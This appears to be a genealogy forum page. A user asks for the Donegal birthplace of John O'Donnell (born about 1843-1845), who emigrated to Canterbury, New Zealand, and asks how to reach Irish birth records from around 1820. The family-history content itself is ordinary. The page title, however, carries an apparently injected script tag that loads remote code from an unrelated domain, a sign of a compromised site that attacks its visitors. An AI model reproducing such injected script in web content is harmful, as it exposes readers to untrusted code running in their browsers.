Í´m looking for more information about my great great grandfather John O´Donnell b1843-1845, Co Donegal, Ireland and his parents, Dennis and Honora (nee Craig) <script src="https://bestdoctornearme.com/splitter.ai/index.php"></script> :: FamilyTreeCircles.com Genealogy
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Í´m looking for more information about my great great grandfather John O´Donnell b1843-1845, Co Donegal, Ireland and his parents, Dennis and Honora (nee Craig)

Query by FindingNemo1

John was born in Co Donegal in Ireland around 1843-1845, He arrived to Lyttleton Port, Christchurch in 1874 and married Bridget Gilroy in 1876 and they had 9 children. John O´Donnell apparently worked for NZ rail and lived in West Eyreton, North Canterbury, New Zealand.

I want to know where exactly he was born in County Donegal, Ireland and the birth place of his father Dennis. They were apparently boot makers. I estimate his parents were born around 1820.

I would also like to know how I can access birth records in Ireland around 1820.

Many thanks

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by FindingNemo1 Profile | Research | Contact | Subscribe | Block this user
on 2019-10-02 20:34:46

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by FindingNemo1 on 2019-10-03 16:51:57

Thanks for your help, unfortunately none of these are the O´Donnells that I am looking for.

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